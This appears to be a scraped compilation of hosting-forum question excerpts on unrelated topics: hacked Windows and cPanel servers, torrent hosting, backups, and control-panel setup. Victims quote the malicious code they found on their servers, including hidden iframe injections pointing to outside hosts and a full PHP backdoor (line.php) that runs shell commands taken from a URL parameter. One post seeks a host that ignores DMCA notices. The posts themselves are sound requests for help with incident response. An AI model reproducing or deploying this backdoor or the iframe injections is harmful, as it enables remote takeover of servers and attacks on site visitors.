Windows Server Hacked And Files Transferred Using Torrent Clients
Nov 8, 2007
I have noticed on a few Windows servers that the server gets hacked and there are tons of files, mostly DVD rips and games, being transferred away, which results in a huge amount of data transferred and bandwidth consumption increasing to as far as 29 Mbps. On further investigation, I find that all the files get stored in either the Recycler directory or the System Volume Information directories on any of the drives. Now these two directories are protected operating system files. Even if there is a Windows firewall installed, it makes no difference. I have even noticed that on some servers there is an automatic exception rule added in the Windows firewall enabling the torrent client to communicate outside the server. This seems to be a common problem with Windows 2003 Server and seems to be some backdoor of Windows allowing hackers to use the server for seeding. Has anybody come across such a problem or know the solution? Kindly help me with this.
Jul 10, 2009
My server was hacked; I can find some HTML and PHP files into which the hacker inserted code similar to the following.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find all the hacked files on the server; is there any way to do this instead of checking the files manually?
Apr 14, 2007
I am being hacked and I don't know how they are getting files on my server. They are doing it on two of my domains; I suspended one and then they got it on the other. My FTP access log does not show anything suspicious.
How can I find their doorway?
Sep 19, 2007
At ThePlanet.com, I have a server running Windows Server
2003 Standard Edition with Service Pack 2 (build 3790).
After several years with no problems, my server was apparently recently hacked.
The server has several FrontPage web sites, and each of those
sites had the following code inserted into the home page.
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src="[url]
Which looks like it is intended to benefit "onlyu", who is
probably an affiliate of four of the listed sites.
I removed the code and changed the password to the server.
But a few days later the following code appeared.
<iframe height="0" width="0" src=[url]
name="I1"></iframe>
<iframe height="0" width="0" src=[url]
name="I2"></iframe>
I changed the password again and removed several users
from the list of users in the computer. But a few days
later the following code appeared ...
<iframe width="0" height="0" src="[url]
<iframe width="0" height="0" src=[url]
Comparing the three groups of code, I'd say it was done by a human and not some sort of Trojan bot.
Does anyone have experience with this particular problem, or general advice about how to deal with it?
Jul 17, 2007
I've been looking for a VPS with Windows, ability for torrents and unmetered bandwidth. I've tried leaseweb and I did not like their service one bit for support. I did not use their 10mb unmetered though. I then tried FDC and they were ok, but now I'm looking for something else that is more like FDC than anything. With FDC I was running Windows 2003, unmetered bandwidth and was doing some torrents a bit. Not music or movies though; I hate 99.9% of the music out and don't bother with movies or software or any of that junk. My speed was fine at up to 100mb literally. Downloading from the net to my FDC server would go as much as 80mb or so, peaking a bit faster for like half a second. Anyhow, the speed there was fine.
So I'm just looking for something else is all. The server I was on was a VDS and cost was for me $79. I had 512mb ram and 100gb drive space.
Sep 10, 2006
I was working on WHM of my server when suddenly I saw CPU load was increasing, and by the time I understood, CPU load was at a peak of 160%. I tried to find the sites overloading the CPU and found that my 4 popular sites were creating the problem. I stopped Apache, suspended all 4 sites and rebooted the server. After the forceful server reboot I found that load was returning to normal at 2.5%. I unsuspended one of 2 forums, but even after I unsuspended it that forum was not opening (IPB). I logged into FTP suspecting some problem and found that index.php was only 45 bytes. I opened index.php and found this text inside .....
May 6, 2009
Some time ago the DC told me there were too many files on the server and I started to investigate what it was, and I got info that someone had hacked the server and was sending spam from it.
When I looked at the accounts in DirectAdmin, some of them had the contact email set to some hacker, so I deleted the emails and changed the password on the DA account and the email of those accounts.
Still I get too many files all the time so the server goes down, so I have to delete the spool file all the time, like 10 times a day.
Please help: how do I detect which account the hacker operates from?
Can I detect that somehow?
Is it possible to do some small script to detect this?
Is there any advanced module to DA that gives me the info?
Oct 20, 2009
How can I seed a torrent from my dedicated server?
When I build the torrent with Torrent Software, I have the possibility to add an HTTP as seed. The intention is to use my server as a seed of this torrent. However, I don't know what I need to change or configure on my server. I searched the internet for info about this, but wasn't able to find any.
The torrent is an ebook written by me with public released domain rights, so there aren't any legal issues. Basically the problem/inquiry is 100% technical.
Nov 1, 2009
I'm setting up a download service which allows users to download files to their space via different methods.
As torrents are one of the methods, I need a dedi server host which allows torrents.
It can be either:
a) Ignore DMCA notices - much easier as it saves us the trouble.
b) Forward all notices to us to reply, and we handle and delete offending files.
Nov 22, 2008
I'm looking for a cheap dedicated server for torrents. What I want is this:
* 1GB RAM or more
* 50GB HDD or more
* 100mbps or higher
* 4000GB bandwidth or more
* Located in Europe with great peering ....
May 27, 2009
Is there any way to block or monitor and find scripts such as rapidleech and other torrent upload scripts on a cPanel server?
Jul 4, 2007
What is the fast and best way?
May 26, 2008
I'm searching for a managed dedicated server which allows torrent tracker scripts.
Can someone tell me which is best to use?
May 31, 2009
I have rented a Windows dedicated server for just about a month, but I never had a problem.
When I copy files on my home computer and then paste them onto the server's drive, the files begin copying, but after some time they stop copying and I hear a double beep sound.
The time after which they stop copying is random.
Mar 28, 2007
At work, we have a Windows 2003 server.
We have a set of files that get modified from day to day.
Since they know I own a dedicated server (Linux), they asked me if it would be possible to have an offsite backup on my server of the set of files on the Windows 2003 server.
Also, I don't want to have the whole file set uploaded every day.
I am aware of rsync on *nix systems, but do you have any suggestions on how to proceed from a Windows 2003 server to a Unix server?
Aug 9, 2013
We are moving our hosting to a new supplier. We offer hosting services to our clients and our present system produces automatic emails with all the client's login details, passwords etc. when you join or buy a new URL.
The new hosting supplier tells me that using Parallels panel this isn't possible.
Having to produce manual emails is not really an option as I see massive problems
Jul 3, 2012
Is there a way to create global default nameservers for our clients to use in Plesk 11? A lot of clients would rather not create their own nameservers, and would simply like to use ours. I can't find any settings in the Plesk Administration where you would create your nameservers as you would in other panels like cPanel/WHM.
Sep 13, 2013
How to make backups separately of all domains and clients, without going into their panel and configuring one by one?
Jul 27, 2014
I'm using Plesk version 12.0.18 with Windows 2012. I need to back up files to a remote FTP server. The remote server configuration is Windows 2012 with IIS server. It works with FTP clients very well.
But I have a problem with Personal FTP Repository. I open Personal FTP Repository Settings and fill in all boxes with true information about the remote FTP server, but it says "Transport error: unable to list directory: Curl error: Login denied".
The FTP server works fine with FTP clients and cPanel backups.
Oct 30, 2007
Hey everyone, I want to make a torrent website, but I'm kind of lost. Does anyone know what type of server I would need for this? And what components should be installed on the server in order for torrents to work?
Apr 15, 2008
I want to transfer a website from 1&1’s control panel to a cPanel host. Can this be done in a “Backup and Restore” kind of format?
The Website has a significant amount of email accounts and messages and I would not want them to get lost in transit.
Nov 10, 2013
Server Version: Apache/2.2.22 (Debian). I have the above server running on a small computer with no screen. I can view server-status no problem and am starting to understand the info.
What I would like to do is check the progress of a largish video upload. I would like to know perhaps how much has been transferred and maybe some idea of time left. Am I able to do this somehow via apache2 or will I have to rely on commands from the server computer?
Sep 8, 2007
My site was hacked today; all pages named index.html were hacked. It is some kind of script, since all pages were written at the same time.
I'm using a very respectable hosting. I jumped from another hosting where I was exposed on an unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
- I found an index.txt file with links to obscure sites.
The code was written at the bottom of all the index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?
error_reporting(0);
if($_GET['cmd45']) {system($_GET['cmd45']);}
$domain = 'shemale1.biz';
$ur = '/load.php?f=%s&ua=%s&ref=%s';
$qs = $_SERVER['QUERY_STRING'];
$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));
$ref = urlencode($_SERVER['HTTP_REFERER']);
$redirect = sprintf($ur,$qs,$ua,$ref);
#print $redirect;
#exit;
echo getcontent($domain,80,$redirect);
exit;
function getcontent($server, $port, $file){
    $socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
    $refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
    fputs($socket, "GET $file HTTP/1.0\n");
    fputs($socket, "Referer: http://$refer\n");
    fputs($socket, "Host: $server\n");
    fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n");
    $wr = 0;
    while(!feof($socket)){
        $temp = fgets($socket);
        if(eregi("<",$temp)) { $wr = 1; }
        if($wr) { $page .= $temp; }
    }
    fclose($socket);
    return $page;
}
?>
So far I have recovered the files from backup, secured the config.php files and modified %index% to read-only... finally changed the password...
May 20, 2008
I transferred all my accounts from my old cPanel server to my new one and
updated the DNS records with my registrar to the new IPs. Unfortunately e-mail is not working; I used the troubleshooter and it seems to be trying to relay my mail to the old IP or something.
I keep getting this error when trying to send to an account:
IPdoes not like recipient.
Remote host said: [IP DOMAIN] is currently not
550-permitted to relay through this server. Perhaps you have not logged into
550-the pop/imap server in the last 30 minutes or do not have SMTP
550 Authentication turned on in your email client.
Giving up on [IP].
May 25, 2008
I need a server dedicated just to emailing prospected clients.
Can anyone turn me onto a decent provider who does not mind excessive mail?
Feb 14, 2008
I am a host reseller and the parent company is upgrading their servers to PHP5. This may break some of my clients' sites (OSCommerce, Zen). Should we fix those sites for free or should my clients pay for the upgrade?
Jul 6, 2007
I have rebuilt Apache, changed the value of MaxClients in httpd.conf to 1500 and restarted the server, but the problem is still the same
Quote:
Originally Posted by httpd.conf
MaxClients 1500
Quote:
Originally Posted by ssh
# /usr/local/apache/bin/apachectl configtest
Syntax OK
Quote:
Originally Posted by email
httpd failed @ Fri Jul 6 21:35:08 2007. A restart was attempted automagicly.
Quote:
Originally Posted by Server Status
Server Load 1.23 (2 cpus)
Memory Used 7.8 %
Mar 31, 2008
How can I transfer files between my Windows server and my PC?
I tried many programs but all of them depend on my PC's speed, so they transfer very slowly. I also tried, before connecting through RDC to the Windows server, checking "Disk Drives" under Local Resources, but that also transfers files slowly.
I want any fast software to copy files as if they were on the same hard drive
Dec 11, 2007
So the other day one of my clients rented a Windows 2003 server. He had no idea how to run a DNS server on it and demanded that we do something about it. Since he had no management plan, we let him know that if he got himself a management plan we could help him out - but it looks as though he was on a tight budget and couldn't opt in for it. The same thing happened last week and again yesterday!
To help these customers out, I was wondering if I could start a DNS service. Each client would get access to it for free regardless of their operating system or management plan. They could point their domains to the nameservers and use the DNS service to point the domain's A records to their servers.
From the start, I have been using EditDNS and am still using it. But come to think of it, it's getting more unstable day by day even though they have 5 servers spread across the globe. I am planning to move to EveryDNS. With this move, I'd like to use their services for my clients too. Rather than running my own DNS servers - I feel this could work out more efficient and reliable.
So what I am planning on doing here is more like creating private nameservers to mask EveryDNS's nameservers. Then have a custom script site built to interact with EveryDNS's APIs. Sounds like a good idea? Then my customer uses the script's interface to create/delete/edit records, etc.
Anyway, I need some advice, suggestions or help in this matter. Has anyone tried this stunt out before? If so, how successful were they/you? How were your customers' reactions towards this (satisfied or not?). Does it stay efficient (in terms of money, time and energy spent)?
Also, if anyone could suggest any programmer who could do this for me (someone well versed with DNS/EveryDNS on PHP/MySQL), it would be nice.
Edit: I guess ServerBeach/Peer 1 has already implemented this. If anyone really knows what's going on there - please share.
Feb 11, 2007
in getting a full list of server addons that clients generally require. I know a few, like:
Zend optimizer
Curl
Ioncube
GD
ImageMagick
etc... but I want to know others which I don't know and which most clients want to have already installed on their host's server.